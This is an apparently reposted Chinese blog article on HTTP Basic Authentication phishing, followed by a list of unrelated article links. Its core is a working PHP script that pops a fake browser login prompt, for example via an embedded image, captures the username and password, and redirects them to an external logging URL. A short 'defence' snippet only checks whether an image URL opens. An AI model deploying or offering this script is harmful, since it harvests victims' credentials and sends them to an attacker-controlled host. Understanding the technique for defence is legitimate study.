基础认证钓鱼攻击与防范
来源:互联网 发布:淘宝 开放的端口 编辑:程序博客网 时间:2024/05/01 00:43
- 前言
这几天基础认证钓鱼很火,我们来了解一下!
- 正文
首先大家回想一下,在访问路由器的时候是不是会弹出这样的一个弹窗让你输入帐号密码登录呢
没错这就是最近很火的基础认证。
那我们如何用php来实现钓鱼攻击呢。
在php手册中有以下代码来演示基础认证登录。
1
2
3
4
5
6
7
8
9
if
(!isset(
$_SERVER
[
'PHP_AUTH_USER'
])) {
header(
'WWW-Authenticate: Basic realm="My Realm"'
);
header(
'HTTP/1.0 401 Unauthorized'
);
echo
'Text to send if user hits Cancel button'
;
exit
;
}
else
{
echo
"<p>Hello {
$_SERVER
[
'PHP_AUTH_USER'
]}.</p>";
echo
"<p>You entered {
$_SERVER
[
'PHP_AUTH_PW'
]}
as
your password.</p>";
}
首先定义HTTP头为WWW-Authenticate,然后相应为401 这样就可以构造一个简单的基础认证框。
基本流程,用户访问被污染服务器,服务器返回信息,浏览器访问图片地址,图片服务器返回401响应,http头为WWW-Authenticate ..... ,浏览器弹出基础认证框, 由于Location:被定义为收信地址所以,浏览器跳转并转递信息至收信地址。 攻击完成。
贴出攻击代码吧。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
$info
=@
$_GET
[
'info'
];
if
(!isset(
$_SERVER
[
'PHP_AUTH_USER'
])){
header("WWW-Authenticate:BASIC Realm=
$info
");
header("HTTP/1.0 401 Unauthorized");
exit
;
}
else
{
/*获取用户名,密码进行验证*/
$user
=
$_SERVER
[
'PHP_AUTH_USER'
];
$pwd
=
$_SERVER
[
'PHP_AUTH_PW'
];
extract(
$_GET
,EXTR_SKIP);
if
(
$user
&&
$pwd
){
header("Location:http:
//www.yunsec.net/config/log.php?user=$user&pass=$pwd");
}
else
{
header("WWW-Authenticate:BASIC Realm=user");
header("HTTP/1.0 401 Unauthorized");
exit
;
}
}
?>
防范措施:
由于这种攻击并不是由漏洞造成的所以我们的防范手法只能去确定图片地址是否为有效图片。
我们可以用以下代码来验证图片是否有效!
1
2
3
4
5
6
7
8
9
10
11
<?php
$url
=
'http://www.yunsec.net/img/baidu_sylogo1.gif'
;
if
( @
fopen
(
$url
,
'r'
) )
{
echo
'File Exits'
;
}
else
{
echo
'File Do Not Exits'
;
}
?>
转自:http://www.yunsec.net/a/security/wlgf/2012/1205/12050.html
0 0
- 基础认证钓鱼攻击与防范
- ssh认证的流程与攻击防范
- 基础认证钓鱼
- PHP 基础认证钓鱼脚本
- 基础认证钓鱼代码编写
- ARP攻击与防范
- ARP攻击与防范
- 木马攻击与防范
- 攻击与防范
- 攻击与防范
- arp攻击与防范
- XSRF 的攻击与防范
- DNS攻击原理与防范
- DNS攻击原理与防范
- DNS攻击原理与防范
- arp攻击原理与防范
- DNS攻击原理与防范
- 钓鱼攻击
- Apache服务器中文url的问题
- Silverlight中使用MVVM(4)—演练
- 上帝都被中国程序员弄崩溃了
- 11627 - Slalom (二分+贪心)
- 有相同数字吗?
- 基础认证钓鱼攻击与防范
- linux性能监控
- CSS清除浮动
- TortoiseSVN文件夹及文件图标不显示解决方法
- Search a 2D Matrix
- 好玩——一些简单的编程练习题
- 位操作实现四则运算
- CvRect
- Java IO 装饰类新说